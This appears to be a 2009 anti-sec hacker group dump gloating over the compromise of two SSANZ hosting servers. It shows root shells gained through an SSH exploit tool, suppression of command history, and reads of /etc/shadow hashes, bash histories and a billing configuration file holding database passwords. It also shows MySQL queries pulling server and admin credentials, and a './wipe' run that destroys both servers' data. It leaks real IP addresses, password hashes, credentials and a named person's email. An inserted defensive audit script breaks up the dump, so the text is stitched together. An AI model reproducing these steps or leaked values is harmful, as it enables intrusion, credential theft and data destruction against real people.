
[ anti-sec ASCII-art banner ]
Some of you have seen a lot of casualties lately in the webhosting scene:
hosting companies being wiped and rm'd at the expense of their clients. While
some of this is collateral damage, we're about to show you, ladies and
gentlemen, that sometimes you aren't pwned because of who you host but what you
say.

Practice what you preach.

- Why SSANZ?

Owned by a kid who claims he can manage, secure and audit servers. He offers a
service that he clearly cannot provide, and we are against that.
LoganNZ <http://www.webhostingtalk.com/member.php?u=56008>:
>>Logan of New Zealand. CEO of Server Systems Administration NZ.
>>
>> Signature:
>>Server Systems Administration NZ | SSANZ
>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
Server Management $25 - Security & Hardening - $50 <http://www.webhostingtalk.com/showthread.php?t=857383>:
>>Server Management - $25 Per Month
>>
>>- Full Management - Support, & 3rd Party Installs
>>- Monitoring - Included - up to 3 ports.
>>- Emergency Recovery
>>Server Security - $50
>>
>>- Initial Scan & Report
>>- Security Hardening & Security Installs/tweaks.
>>- IDS, Security Monitoring & mod_sec configured.
>>- Finishing Security Scan & SSANZ Custom Scans.
>>
>>
>>Emergency Server Recovery - $150
>>
>>- Recover Hacked Server Systems
>>- Recover deleted data
>>- ANTI-dDOS Services
>>- dDOS Investigation

Security Worries? Security Audits - 50% OFF <http://www.webhostingtalk.com/showthread.php?t=859795>:
>>Get your site/server audited to ensure your business data is
>>secure before you become a statistic.
>>
>>In the past 6 months, e-crime activity reports have increased by
>>45% due to the global economic recession.
>>
>>What is involved in a Full Security Audit?
>>
>>External Security
>>
>> * Scan for Shells/malicious scripts
>> * Scan for vulnerable web content ( permissions, RFI's )
>> * Scans for Vulnerable Server Services
>> * Vulnerable Ports
>> * Testing of TCP handling - dDOS test.
>> * Scan for Vulnerable PHP scripts/mods.
>> * Control Panel Security Audit ( external )
>> * Multiple Unique SSANZ Custom Scans*
>>
>>Internal Security
>>
>> * Permissions/Ownership(s) Review
>> * Apache/Webserver Security
>> * User Account Security & binaries access audit
>> * Local RFI Exploits located/patched.
>> * System Binary Security Audit
>> * Firewall/IPTABLES Audit
>> * Bruteforce detection test & audit
>> * Root Access Authentication Audit
>> * Local PHP Functions Audit
>> * Control Panel Security Audit ( Internal )
>> * Kernel Security Audit
>> * Additional SSANZ Custom Scans/Audit*
We at anti-sec decided to give you a _FREE_ Full Security Audit!*
* `rm -rf /` is included.
anti-sec:~/pwn# ./map ssanz.net
IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3
IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3
anti-sec:~/pwn# cd xpl/
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.143.133
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
sh-3.2# w
 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224   20:17    7:26m  13:18  13:18 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 3008
drwxr-x---  24 root     root        4096 Jul  4 03:43 .
drwxr-xr-x  27 root     root        4096 Jun 27 02:49 ..
-rw-------   1 root     root         957 Jun 13 07:24 .accesshash
-rw-------   1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
-rw-------   1 root     root       15460 Jul  3 23:38 .bash_history
-rw-r--r--   1 root     root          24 Jan  6  2007 .bash_logout
-rw-r--r--   1 root     root         191 Jan  6  2007 .bash_profile
-rw-r--r--   1 root     root         176 Jan  6  2007 .bashrc
drwxrwxrwx   3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
-rw-r--r--   1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x   3 root     root        4096 Nov 15  2006 cmm
-rw-r--r--   1 root     root       18656 Feb 28 11:32 cmm.tgz
drwxr-xr-x   3 root     root        4096 Nov  5  2006 cmq
-rw-r--r--   1 root     root       14507 Oct 10  2008 cmq.tgz
drwxr-xr-x   4 root     root        4096 Jun  1 14:33 .cpanel
drwxr-xr-x   4 root     root        4096 Jun  1 17:10 cpanel3-skel
drwx------   3 root     root        4096 Jun  1 13:50 .cpobjcache
drwxr-xr-x  10 root     root        4096 Apr 13 16:17 csf
-rw-r--r--   1 root     root      430121 May 15 12:07 csf.tgz
-rw-r--r--   1 root     root         100 Jan  6  2007 .cshrc
drwx------   2 root     root        4096 Jun  1 13:54 .elinks
-rw-r--r--   1 root     root     1176672 Jul  4 03:40 error_log
-rw-r--r--   1 root     root          16 Jun  3 08:34 .forward
drwx------   3 root     root        4096 Jun  1 10:39 .gconf
drwx------   2 root     root        4096 Jun  1 10:39 .gconfd
drwxr-xr-x   4 root     root        4096 Jun 10 23:42 .gem
drwx------   2 root     root        4096 Jun  1 13:55 .gnupg
drwxrwxrwx   5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
-rw-r--r--   1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--   1 root     root         561 Jun 27 02:48 .htoprc
-rw-r--r--   1 root     root        8144 Jun  6 19:23 index.html
-rw-r--r--   1 root     root        4246 Jun  1 10:39 install.log.syslog
drwxr-xr-x   6 500      root        4096 Sep 13  2005 iptraf-3.0.0
-rw-r--r--   1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
-rw-r--r--   1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
-rw-r--r--   1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
-rw-r--r--   1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
drwx------   6 root     root        4096 Jun  1 14:21 .MirrorSearch
-rw-------   1 root     root          61 Jun 12 21:04 .my.cnf
-rw-------   1 root     root         139 Jul  3 10:51 .mysql_history
-rwxrwxrwx   1 root     root       38688 Dec  1  2008 mysqltuner.pl
-rw-r--r--   1 root     root         264 Jul  2 21:43 .pearrc
drwxr-xr-x   2 root     root        4096 Jun  1 17:04 public_ftp
drwxr-xr-x   3 root     root        4096 Jun  1 17:04 public_html
-rw-------   1 root     root        1024 Jun  7 19:50 .rnd
drwx------   3 root     root        4096 Jun  1 14:29 .spamassassin
drwx------   2 root     root        4096 Jun  2 06:41 .ssh
-rw-r--r--   1 root     root         129 Jan  6  2007 .tcshrc
drwxr-xr-x   3 root     root        4096 Jun  7 21:54 tmp
-rw-------   1 root     root           0 Jun  7 22:01 .trustwavereqs
drw-------   2 root     root        4096 Jun  3 08:18 whmrbackups
drw-------   3 root     root        4096 Jun 10 08:25 whmrcorebackups

sh-3.2# cat .bash_history
htop
htop
p
htop
tail -f /var/log/secure
tail -f /var/log/secure
[snip]
nano highperformance.conf
service httpd restart
nano highperformance.conf
service httpd restart
nano highperformance.conf
nano httpd.conf
nano php.conf
ls
nano modsec2.conf
ls
[snip]
nano visit4cash.net.conf
cd ..
[snip]
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
ps -aux|grep -i HTTP|wc -l
w
bwm-ng
[snip]
netstat -plan|grep :80|awk {'print $5'}|cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {'print $5'} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -plan|grep :80| awk {'print $5'} |cut -d: -f 1|sort|uniq -c|sort -n
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
[snip]
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
[snip]
service cups stop
chkconfig cups off
service nfslock stop
chkconfig nfslock off
service rpcidmapd stop
chkconfig rpcidmapd off
service bluetooth stop
chkconfig bluetooth off
service anacron stop
chkconfig anacron off
service avahi-daemon stop
chkconfig avahi-daemon off
service hidd stop
chkconfig hidd off
service pcscd stop
chkconfig pcscd off
[snip]
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
htop
screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
[snip]
wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz
htop
[snip]
wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz
wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz
[snip]
wget http://www.logview.org/logview-install
chmod +x logview-install
./logview-install
rm -rf logview-install
sh-3.2# grep sec /etc/userdomains
affiliatesecrets.wecloak.info: wecloaki
infosecawareness.info: andlyssa
secproxy.info: secproxy
infosecawareness.andly.ssanz.net: andlyssa
greycloud.nakedinsects.com: greyclou
serversecuritynz.com: forumz
orac.nakedinsects.com: oracnz
infernal.nakedinsects.com: infernal
nakedinsects.com: ni
fluffy.nakedinsects.com: fluffy
quickclix.orac.nakedinsects.com: oracnz
seco39.ssanz.net: secossan
sh-3.2# lastlog | grep -v Never
Username         Port     From             Latest
root             pts/1    125.238.144.224  Fri Jul  3 20:27:03 -0400 2009
simmobim         pts/0    118.69.80.114    Fri Jun 12 00:22:04 -0400 2009
mattss           pts/1    118.90.48.0      Sun Jun 21 04:44:58 -0400 2009
etasmtco         pts/0    189.31.24.129    Sat Jun 20 10:14:51 -0400 2009

sh-3.2# cd ~billing
sh-3.2# ls -la
total 301252
drwx--x--x  15 billing billing     4096 Jun 28 02:08 .
drwx--x--x 737 root    root       20480 Jul  4 00:37 ..
lrwxrwxrwx   1 billing billing       33 Jun  2 01:58 access-logs -> /usr/local/apache/domlogs/billing
-rw-------   1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz
-rw-------   1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz
-rw-------   1 billing billing 84475934 Jun  3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz
-rw-------   1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz
-rw-r--r--   1 billing billing       24 May 27  2008 .bash_logout
-rw-r--r--   1 billing billing      176 May 27  2008 .bash_profile
-rw-r--r--   1 billing billing      124 May 27  2008 .bashrc
-rw-------   1 billing billing       17 May 27  2008 .contactemail
drwxr-xr-x   5 billing billing     4096 May  8 02:48 .cpanel
-rw-r-----   1 billing billing        0 Apr  4 06:32 cpbackup-exclude.conf
drwxr-xr-x   2 billing billing     4096 Jun  2 01:57 cpmove.psql
drwxr-xr-x   3 billing billing     4096 Nov 12  2008 cpmove.psql.1240007789
drwxr-xr-x   2 billing billing     4096 Apr 16 23:24 cpmove.psql.1243922290
-rw-r--r--   1 billing billing   532304 Jul  4 03:45 error_log
drwxr-x---   4 billing mail        4096 Jan 19 21:39 etc
drwxr-x---   2 billing nobody      4096 May 27  2008 .htpasswds
-rw-r--r--   1 billing billing        7 Nov 12  2008 .lang
-rw-------   1 billing billing       15 Jun 28 02:07 .lastlogin
drwxrwx---  10 billing billing     4096 Jul  2 21:43 mail
drwxr-xr-x   4 billing billing     4096 Nov 12  2008 .mozilla
drwxr-xr-x   3 billing billing     4096 Apr 29  2008 public_ftp
drwxr-x---  24 billing nobody      4096 Jun 28 02:55 public_html
drwx------   4 billing billing     4096 Jun  7 21:53 ssl
drwxr-xr-x   7 billing billing     4096 Feb 25 17:59 tmp
drwx------   2 billing billing     4096 May 27  2008 .trash
lrwxrwxrwx   1 billing billing       11 Jun  2 01:58 www -> public_html
-rw-r--r--   1 billing billing      658 May 27  2008 .zshrc

sh-3.2# cd www/
sh-3.2# ls
_private              cart.php               images                pipe
_vti_bin              cgi-bin                includes              postinfo.html
_vti_cnf              clientarea.php         index.php             register.php
_vti_inf.html         configuration.php      init.php              serverstatus.php
_vti_log              configuration.php.new  installmingchowping   status
_vti_pvt              configuressl.php       knowledgebase.php     submitticket.php
_vti_txt              contact.php            lang                  supporttickets.php
admin                 creditcard.php         libs                  templates
aff.php               dbconnect.php          link.php              templates_c
affiliates.php        display.php            login.php             tutorials.php
announcements.php     dl.php                 logout.php            upgrade
announcements.xml     dologin.php            modules               upgrade.php
announcementsrss.php  domainchecker.php      networkissues.php     viewemail.php
attachments           downloads              networkissuesrss.php  viewinvoice.php
banned.php            downloads.php          order.php             viewticket.php
billing               htaccess.txt           passwordreminder.php  whois.php

sh-3.2# cat configuration.php
<?php
$license="93881365561d";
$db_host = "localhost";
$db_username = "billing_billusr";
$db_password = "X2qL6:qWCCb6";
$db_name = "billing_billing";
$cc_encryption_hash = "57jR9sVyPKcDvZ4Ppy4I56sjYLI6mmEjhPQJ1sEAqBw7O952JlkTlrAbzLLmTx9K";
$templates_compiledir = "templates_c/";
?>
sh-3.2# mysql
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 11021136
Server version: 5.0.81-community MySQL Community Edition (GPL)
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> use billing_billing;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+----------------------------+
| Tables_in_billing_billing  |
+----------------------------+
| mod_ipmanager              |
| mod_ipmonitor              |
| tblaccounts                |
| tblactivitylog             |
| tbladdons                  |
| tbladminlog                |
| tbladminperms              |
| tbladminroles              |
| tbladmins                  |
| tbladminsecurityquestions  |
| tblaffiliates              |
| tblaffiliatesaccounts      |
| tblaffiliateshistory       |
| tblaffiliatespending       |
| tblaffiliateswithdrawals   |
| tblannouncements           |
| tblbannedemails            |
| tblbannedips               |
| tblbillableitems           |
| tblbrowserlinks            |
| tblcalendar                |
| tblcancelrequests          |
| tblclientgroups            |
| tblclients                 |
| tblconfiguration           |
| tblcontacts                |
| tblcredit                  |
| tblcurrencies              |
| tblcustomfields            |
| tblcustomfieldsvalues      |
| tbldomainpricing           |
| tbldomains                 |
| tbldomainsadditionalfields |
| tbldownloadcats            |
| tbldownloads               |
| tblemails                  |
| tblemailtemplates          |
| tblfraud                   |
| tblgatewaylog              |
| tblhosting                 |
| tblhostingaddons           |
| tblhostingconfigoptions    |
| tblinvoiceitems            |
| tblinvoices                |
| tblknowledgebase           |
| tblknowledgebasecats       |
| tblknowledgebaselinks      |
| tbllinks                   |
| tblnetworkissues           |
| tblnotes                   |
| tblorders                  |
| tblpaymentgateways         |
| tblpricing                 |
| tblproductconfiggroups     |
| tblproductconfiglinks      |
| tblproductconfigoptions    |
| tblproductconfigoptionssub |
| tblproductgroups           |
| tblproducts                |
| tblpromotions              |
| tblquoteitems              |
| tblquotes                  |
| tblregistrars              |
| tblservers                 |
| tblsslorders               |
| tbltax                     |
| tblticketbreaklines        |
| tblticketdepartments       |
| tblticketescalations       |
| tblticketlog               |
| tblticketmaillog           |
| tblticketnotes             |
| tblticketpredefinedcats    |
| tblticketpredefinedreplies |
| tblticketreplies           |
| tbltickets                 |
| tblticketspamfilters       |
| tbltodolist                |
| tblupgrades                |
| tblwhoislog                |
+----------------------------+
80 rows in set (0.00 sec)
mysql> select name,ipaddress,hostname,username,password from tblservers;
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| name         | ipaddress      | hostname         | username | password                                                                 |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
| Osiris       | 66.197.143.133 | Osiris.ssanz.net | ssanz    | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co=                             |
| Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root     | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== |
| Devil        | 66.197.204.101 | devil.ssanz.net  | root     | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A==             |
+--------------+----------------+------------------+----------+--------------------------------------------------------------------------+
3 rows in set (0.00 sec)
mysql> select firstname,lastname,email,username,password from tbladmins;
+-----------+----------+-----------------+----------+----------------------------------+
| firstname | lastname | email           | username | password                         |
+-----------+----------+-----------------+----------+----------------------------------+
| Logan     | Douglas  | Logan@ssanz.net | Admin    | c6df529826cf16ac5bedb424d8ac972b |
+-----------+----------+-----------------+----------+----------------------------------+
1 row in set (0.06 sec)
mysql> quit
Bye
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             2.0G  477M  1.4G  26% /
/dev/sda8             875G  147G  684G  18% /home
/dev/sda3             9.7G  6.8G  2.5G  74% /usr
/dev/sda2             9.7G  7.0G  2.3G  76% /var
/dev/sda1              99M   23M   72M  24% /boot
/dev/sda6             996M   64M  881M   7% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1             459G  163G  273G  38% /backup

sh-3.2# ./wipe
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5              64Z   64Z  1.5G 100% /
/dev/sda8              64Z   64Z  729G 100% /home
/dev/sda3              64Z   64Z  3.0G 100% /usr
/dev/sda2              64Z   64Z  3.0G 100% /var
/dev/sda1              16Z   16Z     0 100% /boot
/dev/sda6              64Z   64Z  933M 100% /tmp
tmpfs                 3.9G     0  3.9G   0% /dev/shm
/dev/sdb1              64Z   64Z  296G 100% /backup
sh-3.2# exit
exit
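A few checks that follow from the osiris session above, added here as an editorial example. This is not anti-sec's tooling and not anything SSANZ shipped. Each function turns one finding visible in the dump into something an admin could run: root logged in over SSH from a remote address (`w`, `lastlog`), `$1$` MD5-crypt hashes in /etc/shadow, world-writable directories in /root owned by customer accounts (bwm-ng-0.6, htop-0.8.1) plus a 0777 mysqltuner.pl, and a bare 32-hex admin password hash in tbladmins. Assumptions: a Linux host with GNU find and awk; every path is a parameter, and the inputs used to exercise the functions are constructed, not taken from the boxes above.

```sh
#!/bin/sh
# Editorial post-mortem checks (added example; not anti-sec's or SSANZ's code).
# Every path is a parameter so the functions can be exercised on constructed
# test data as well as on a live host. Assumes GNU find/awk (Linux).

# 1. Entries directly under a privileged home directory that are world-
#    writable or not owned by root. In the /root listing above, bwm-ng-0.6
#    and htop-0.8.1 are drwxrwxrwx and owned by customer accounts, and
#    mysqltuner.pl is -rwxrwxrwx: any local shell user could replace what
#    root later builds or runs from there.
audit_privileged_home() {
    dir="${1:-/root}"
    find "$dir" -mindepth 1 -maxdepth 1 -perm -o+w \
        -printf 'WORLD-WRITABLE %M %u %p\n'
    find "$dir" -mindepth 1 -maxdepth 1 ! -user root \
        -printf 'NON-ROOT-OWNER %M %u %p\n'
}

# 2. Direct root login over SSH. `w`, `who` and `lastlog` above show root on
#    a pts from a remote address. Before OpenSSH 7.0 (these boxes run 4.3) an
#    absent PermitRootLogin directive means "yes", so absence is reported as
#    permitted. Prints one of: disabled, key-only, forced-commands, permitted.
sshd_root_login_state() {
    cfg="${1:-/etc/ssh/sshd_config}"
    # last uncommented directive wins; "#PermitRootLogin ..." lines do not
    # match because the pattern allows only whitespace before the keyword
    val=$(grep -i '^[[:space:]]*PermitRootLogin[[:space:]]' "$cfg" 2>/dev/null \
          | tail -n 1 | awk '{print tolower($2)}')
    case "$val" in
        no)                                 echo disabled ;;
        without-password|prohibit-password) echo key-only ;;
        forced-commands-only)               echo forced-commands ;;
        *)                                  echo permitted ;;
    esac
}

# 3. Hash scheme classification. Works for the second field of /etc/shadow
#    ($1$ = MD5-crypt on both boxes above) and for application tables that
#    store a bare 32-hex digest (the tbladmins row above), which has the
#    shape of an unsalted MD5 and costs one hash computation per guess.
classify_hash() {
    h="$1"
    case "$h" in
        '$6$'*) echo 'sha512-crypt (salted, iterated)' ;;
        '$5$'*) echo 'sha256-crypt (salted, iterated)' ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo 'bcrypt (salted, tunable cost)' ;;
        '$1$'*) echo 'md5-crypt (salted, fixed 1000 rounds of MD5, deprecated)' ;;
        *)
            if printf '%s' "$h" | grep -Eq '^[0-9a-f]{32}$'; then
                echo 'unsalted-md5-shape (bare 32-hex digest, wordlist-crackable)'
            else
                echo 'unknown'
            fi ;;
    esac
}

# Convenience wrapper: classify the hash field of one /etc/shadow line.
classify_shadow_line() {
    classify_hash "$(printf '%s' "$1" | cut -d: -f2)"
}

# Stand-alone run against the live host: ./checks.sh --live
if [ "${1:-}" = "--live" ]; then
    audit_privileged_home /root
    echo "PermitRootLogin: $(sshd_root_login_state)"
    if [ -r /etc/shadow ]; then
        classify_shadow_line "$(grep '^root:' /etc/shadow)"
    fi
fi
```

The sshd check reads only the main config file and ignores Match blocks, so treat a "permitted" verdict as a reason to confirm with `sshd -T` (OpenSSH 5.1 and later) rather than as the final word; the directory audit is deliberately one level deep because that is where root's own tarballs and scripts live.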

----------------------------------
osiris  [ DOWN ]
devil   [ UP ]
----------------------------------
anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22
[+] 0wn0wn - anti-sec group
[+] Target: 66.197.204.101
[+] SSH Port: 22
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
sh-3.2# export HISTFILE=/dev/null
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh-3.2# uname -a
Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# head -n1 /etc/shadow
root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7:::
sh-3.2# w
 04:10:20 up 4 days, 12:11,  1 user,  load average: 3.25, 2.09, 1.68
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    125.238.144.224   20:18    7:51m   6:38   6:38 htop
sh-3.2# pwd
/root
sh-3.2# ls -la
total 1232
drwxr-x---  23 root root   4096 Jul  4 04:06 .
drwxr-xr-x  25 root root   4096 Jun 29 14:33 ..
-rw-------   1 root root    957 Jun 13 05:20 .accesshash
-rw-------   1 root root    937 Jun 12 00:01 anaconda-ks.cfg
-rw-------   1 root root   7258 Jun 30 10:03 .bash_history
-rw-r--r--   1 root root     24 Jan  6  2007 .bash_logout
-rw-r--r--   1 root root    191 Jan  6  2007 .bash_profile
-rw-r--r--   1 root root    176 Jan  6  2007 .bashrc
drwxrwxrwx   3 1000 1000   4096 Jun 12 04:45 bwm-ng-0.6
-rw-r--r--   1 root root 141564 Mar  1  2007 bwm-ng-0.6.tar.gz
drwxr-xr-x   3 root root   4096 Nov  5  2006 cmq
-rw-r--r--   1 root root  14507 Oct 10  2008 cmq.tgz
drwxr-xr-x   4 root root   4096 Jun 12 02:51 .cpanel
drwxr-xr-x   4 root root   4096 Jun 12 03:26 cpanel3-skel
drwx------   3 root root   4096 Jun 12 00:17 .cpobjcache
drwxr-xr-x   2 root root   4096 Aug 21  2006 cse
-rw-r--r--   1 root root  12207 Oct 10  2008 cse.tgz
drwxr-xr-x  10 root root   4096 Jun  5 05:05 csf
-rw-r--r--   1 root root 431490 Jun  5 10:52 csf.tgz
-rw-r--r--   1 root root    100 Jan  6  2007 .cshrc
drwx------   2 root root   4096 Jun 12 01:51 .elinks
-rw-r--r--   1 root root     16 Jun 13 15:33 .forward
drwx------   3 root root   4096 Jun 11 23:59 .gconf
drwx------   2 root root   4096 Jun 11 23:59 .gconfd
drwxr-xr-x   4 root root   4096 Jun 12 04:29 .gem
drwx------   2 root root   4096 Jun 12 01:53 .gnupg
drwxrwxrwx   6 1002 1002   4096 Jun 12 04:24 htop-0.8.1
-rw-r--r--   1 root root 414870 Sep 23  2008 htop-0.8.1.tar.gz
-rw-r--r--   1 root root    561 Jun 12 23:31 .htoprc
-rw-r--r--   1 root root   4239 Jun 12 00:01 install.log.syslog
drwx------   6 root root   4096 Jun 12 02:33 .MirrorSearch
-rw-------   1 root root     37 Jun 12 02:11 .my.cnf
drwxr-xr-x   3 1000 1000   4096 Jun 12 05:42 mytop-1.6
-rw-r--r--   1 root root  19720 Feb 16  2007 mytop-1.6.tar.gz
-rw-r--r--   1 root root    264 Jun 23 00:23 .pearrc
drwxr-xr-x   2 root root   4096 Jun 12 03:21 public_ftp
drwxr-xr-x   3 root root   4096 Jun 12 03:21 public_html
-rw-------   1 root root   1024 Jun 12 02:50 .rnd
drwx------   3 root root   4096 Jun 12 02:41 .spamassassin
drwx------   2 root root   4096 Jun 22 09:11 .ssh
-rw-r--r--   1 root root    129 Jan  6  2007 .tcshrc
drwxr-xr-x   3 root root   4096 Jun 12 02:40 tmp
drwxr-xr-x   2 root root   4096 Jun 16 19:23 .wapi

sh-3.2# cat .bash_history
sh hninst.sh
passwd
fdisk -l
exit
w
history
screen -ls
screen -r 2785.pts-0.devil
exit
wget http://merovingian.net.nz/htop-0.8.1.tar.gz
[snip]
csf -a 125.238.144.110
exit
cd /home
ls
wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz
[snip]
wget http://visit4cash.net/mainfiles.tar.gz
mv mainfiles.tar.gz /home/visit4ca/public_html
cd /home
cd visit4ca
cd public_html
ls
tar zxvf mainfiles.tar.gz
[snip]
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.165.50.38
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 89.38.206.233
csf --restart
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
csf -d 118.94.59.33
netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
[snip]
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso
screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso
sh-3.2# cat /etc/userdomains
advertising.ssanz.net: adserver
forums.visit4cash.net: forumsv4
megacashzone.com: megacash
visit4cash.net: visit4ca
seanone.com: seanonec
backup2.ssanz.net: backup2
*: nobody
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              31G  7.5G   22G  26% /
/dev/sdb1             452G   35G  394G   9% /home
/dev/sda1              99M   23M   72M  24% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp
sh-3.2# who
root     pts/0        2009-07-03 20:18 (125.238.144.224)

sh-3.2# ./wipe
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda3              64Z   64Z   24G 100% /
/dev/sdb1              64Z   64Z  417G 100% /home
/dev/sda1              16Z   16Z   77M 100% /boot
tmpfs                 495M  4.0K  495M   1% /dev/shm
/usr/tmpDSK           485M   14M  446M   3% /tmp
sh-3.2# exit
exit
----------------------------------
osiris  [ DOWN ]
devil   [ DOWN ]
----------------------------------

Once again, practice what you preach. Don't claim to be something you're not.
Most importantly, don't go after us. We're not the problem. What you say does
not align AT ALL with what you actually do with your servers.
Fix that first, you dig?

~ There will always be no way out.
